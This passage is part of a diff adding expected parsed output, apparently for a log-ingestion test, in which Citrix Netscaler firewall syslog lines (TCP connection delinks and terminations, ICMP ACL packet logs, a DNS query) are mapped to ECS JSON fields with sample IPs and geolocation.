"total_bytes_send": 1075, + "vserver": { + "ip": "81.2.69.144", + "port": 80 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 352, + "ip": "81.2.69.144", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:23.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.10.10", + "81.2.69.144" + ] + }, + "server": { + "ip": "81.2.69.144", + "port": 80 + }, + "source": { + "bytes": 1075, + "ip": "192.168.10.10", + "nat": { + "ip": "192.168.10.10", + "port": 52187 + }, + "port": 52187 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "192.168.10.51", + "port": 35341 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "192.168.10.35", + "port": 80 + }, + "start_time": "2014-10-06T14:02:43.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "192.168.10.51", + "port": 35341 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4472", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:43.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.10.35", + "192.168.10.51", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "192.168.10.35", + "port": 80 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "127.0.0.2", + "port": 55623 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "127.0.0.1", + "port": 7776 + }, + "start_time": "2014-10-06T14:02:45.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "127.0.0.2", + "port": 55623 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4473", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:45.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "127.0.0.1", + "127.0.0.2", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "127.0.0.1", + "port": 7776 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "127.0.0.2", + "port": 39771 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "127.0.0.1", + "port": 80 + }, + "start_time": "2014-10-06T14:02:46.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "127.0.0.2", + "port": 39771 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4474", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:46.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "127.0.0.1", + "127.0.0.2", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "127.0.0.1", + "port": 80 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2022-06-14T16:05:04.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "total_bytes_received": 204800, + "total_bytes_send": 102400, + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 204800, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2022-06-14T16:05:04.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "end_time": "2023-04-01T11:05:00.000Z", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 102400, + "total_bytes_send": 51200 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 102400, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 51200, + "ip": "192.168.1.100", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400" + }, + "facility": "local0", + "host": "ns1", + "name": "OTHERCONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2023-04-01T12:00:00.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "total_bytes_received": 102400, + "total_bytes_send": 51200, + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 102400, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T12:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 51200, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset" + }, + "facility": "local0", + "host": "ns1", + "name": "NAT_CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "closure_reason": "Client Reset", + "delink_time": "2023-04-01T11:05:00.000Z", + "delink_timezone": "GMT", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "original_destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 153600, + "total_bytes_send": 102400, + "translated_destination": { + "ip": "1.128.0.0", + "port": 8080 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 153600, + "ip": "1.128.0.0", + "port": 8080 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset", + "reason": "Client Reset", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout" + }, + "facility": "local0", + "host": "ns1", + "name": "NAT_OTHERCONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "closure_reason": "Timeout", + "delink_time": "2023-04-01T11:05:00.000Z", + "delink_timezone": "GMT", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "original_destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 153600, + "total_bytes_send": 102400, + "translated_destination": { + "ip": "1.128.0.0", + "port": 8080 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 153600, + "ip": "1.128.0.0", + "port": 8080 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout", + "reason": "Timeout", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "device_event_class_id": "ACL", + "extended": { + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data" + }, + "facility": "local0", + "host": "ns1", + "name": "ACL_PKT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "code": "0", + "destination": { + "ip": "1.128.0.0" + }, + "hit": { + "count": 5, + "rule": "Allow ICMP" + }, + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "protocol": "ICMP", + "source": { + "ip": "192.168.1.100" + }, + "timestamp": "2021-03-30T16:57:36.789Z", + "type": "8" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "code": "0", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "icmp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "device_event_class_id": "ACL", + "extended": { + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data" + }, + "facility": "local0", + "host": "ns1", + "name": "ACL6_PKT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "code": "1", + "destination": { + "ip": "1.128.0.0" + }, + "hit": { + "count": 3, + "rule": "Block ICMP" + }, + "message": "Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "protocol": "ICMP", + "source": { + "ip": "192.168.1.100" + }, + "timestamp": "2021-03-30T16:57:47.890Z", + "type": "3" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "code": "1", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "icmp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_QUERY", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "category": "15", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain": "example.com", + "message": "Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "reason": "UserAuthenticated ", + "source": { + "ip": "192.168.1.10", + "port": 12345 + }, + "user": "johndoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + 